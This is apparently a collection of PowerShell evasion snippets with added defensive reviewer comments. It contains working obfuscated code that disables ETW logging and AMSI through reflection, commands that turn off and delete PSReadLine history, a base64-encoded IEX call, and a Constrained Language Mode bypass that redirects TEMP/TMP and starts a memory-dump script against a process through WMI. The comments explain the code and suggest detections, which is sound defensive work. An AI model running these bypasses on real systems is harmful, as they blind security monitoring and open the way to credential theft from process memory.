Random PowerShell Bypasses
# Logging bypass: | |
# Reviewer note (defensive): the line below resolves, via reflection, the type whose name is
# assembled from the concatenated fragments (System.Management.Automation.Tracing.PSEtwLogProvider),
# takes its NonPublic,Static field 'etwProvider' and overwrites it with a new EventProvider bound to
# a freshly generated GUID. Presumably ETW consumers subscribed to the original provider GUID stop
# receiving PowerShell events afterwards -- confirm against the runtime.
# Detection: backtick-spliced member names ("aSs`emblY", "Getty`PE", "gEtf`ieLD") and a type name
# built from string concatenation are high-signal on their own; Script Block Logging (4104) records a
# block when it is created, so the bypass text itself is likely captured -- TODO confirm ordering.
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
# AMSI Bypass (old, burned) | |
# Reviewer note (defensive): the -f format-string splicing rebuilds the type name
# System.Management.Automation.AmsiUtils and the field name amsiInitFailed; the field is then set via
# reflection with ${n`ULl},${t`RuE}, i.e. SetValue($null, $true). The detour through a variable
# named 1q2uZx holds [TYpE]"rEF" (the [ref] accelerator) and only serves obfuscation.
# The author's own "burned" label should be read literally: this exact pattern is already detected,
# so its presence on a host is a reliable indicator rather than a working evasion.
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
# New AMSI bypass obfuscation: | |
# Reviewer note (defensive): same target as the previous snippet (AmsiUtils.amsiInitFailed), with the
# member names now stitched together from `$(echo ...)` sub-expressions and backticks inside the
# string; `$()` evaluates to $null and `$(1 -eq 1)` to $true, so the final call is again
# SetValue($null, $true). Detection: sub-expressions and backticks embedded in member-access strings
# ("...`A$(echo sse)`mB...") have no legitimate use and are a strong lexical signature; the
# de-obfuscated member names are what the runtime sees, so hooking at the reflection layer rather
# than on raw text is the more robust control -- TODO confirm what the local EDR reports.
[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1)) | |
# Neuter Writes to History Log: | |
# Reviewer note (defensive): this only changes PSReadLine's console-history persistence for the
# current session; it is a user convenience file, not a security log. To my reading it does not
# affect Script Block Logging, module logging or transcription, which keep recording -- confirm
# against the host's logging configuration.
Set-PSReadlineOption -HistorySaveStyle SaveNothing | |
# Encoded version of blocking writes to history | |
# Reviewer note (defensive): the base64 is decoded as UTF-16LE (Unicode.GetString) and piped to IEX;
# per the author's comment the payload is the Set-PSReadlineOption line above. Decoding plus
# Invoke-Expression is an "encoded command" pattern worth alerting on regardless of the payload, and
# the decoded text reaches the pipeline in the clear, so script-block logs should show it
# -- TODO confirm.
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('UwBlAHQALQBQAFMAUgBlAGEAZABsAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAUwBhAHYAZQBOAG8AdABoAGkAbgBnAA==')) | IEX | |
# Delete history logs | |
# Reviewer note (defensive): `rm` (Remove-Item) deletes the single file reported by
# (Get-PSReadlineOption).HistorySavePath, i.e. the PSReadLine console history. It is a plain file
# deletion, visible to file-system auditing, and leaves event-log based telemetry untouched.
rm (Get-PSReadlineOption).HistorySavePath | |
# Constrained Language Mode Bypass | |
# Reviewer note (defensive): the sequence below saves $env:temp / $env:tmp, rewrites the user-scope
# HKCU:\Environment values Tmp and Temp to C:\windows\temp, launches a new powershell.exe through
# Win32_Process.Create with $command, waits 5 s, then restores the original values. Why a child
# started with the redirected TEMP/TMP lands in a less restricted language mode is not shown here
# (presumably policy-dependent -- confirm against the host's AppLocker/WDAC configuration).
# Observable points in this code: registry value writes under HKCU\Environment, a process created
# via WMI (parent is the WMI provider host rather than the calling shell), a script read from
# C:\users\public\documents, and a .dmp written to the same world-writable location.
$command = @" | |
powershell -c "iex (cat c:\users\public\documents\Invoke-MemoryDump.ps1 | out-string); Invoke-MemoryDump -ProcID 544 -OutputPath 'C:\users\public\documents\out.dmp'" | |
"@ | |
# Snapshot of the current values so they can be put back afterwards.
$CurrTemp = $env:temp | |
$CurrTmp = $env:tmp | |
$TEMPBypassPath = "C:\windows\temp" | |
$TMPBypassPath = "C:\windows\temp" | |
# NOTE(review): the names are crossed here (TEMPBypassPath -> Tmp, TMPBypassPath -> Temp); both
# variables hold the same string, so there is no behavioral effect, only a readability wart.
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TEMPBypassPath" | |
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath" | |
Invoke-WmiMethod -Class win32_process -Name create -ArgumentList $command | |
# `sleep` is the Start-Sleep alias; the fixed 5 s window is the only synchronisation with the child,
# which is racy -- a slow start would see the restored values below.
sleep 5 | |
# Restore; the same crossed naming as above, again with identical effect.
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp | |
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $CurrTemp | |